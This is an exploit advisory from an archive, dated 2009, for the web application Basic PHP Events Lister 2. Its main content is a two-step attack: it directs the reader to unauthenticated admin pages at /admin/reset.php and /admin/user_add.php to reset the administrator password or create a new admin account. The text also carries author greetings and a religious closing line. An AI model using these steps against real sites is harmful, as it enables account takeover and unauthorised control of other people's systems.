id: 5714
date: 08/30/2009
title: Basic PHP Events Lister 2 Reset Admin Pass/Add Admin Vulns
author: Mr.SeCreT
cves: 

==========================================================
Basic PHP Events Lister 2 Reset Admin Pass/Add Admin Vulns
==========================================================


##########################################################################
#@ Basic PHP Events Lister 2 (Reset Admin Pass\ Add Admin) Vul          
#@ download: http://www.mevin.com/downloads/Basic-php-events-lister2.zip
##########################################################################
#@ Author: Mr.SeCreT                                                                                               
#@ Greatz T0: Reno , And All Muslims                                   
##########################################################################
#@ Exploit:                                                             
#@ Reset Admin Pass:                                                    
#@ Just Go Here: http:// [Site] / [Path] /admin/reset.php               
#@ And Put  New Pass                                                 
#@                                                                      
#@ Add Admin:                                                           
#@ Just Go Here: http:// [Site] / [Path] /admin/user_add.php            

There is no god but Allah Mohammed is messenger of Allah



#  0day.today [2023-03-26]  #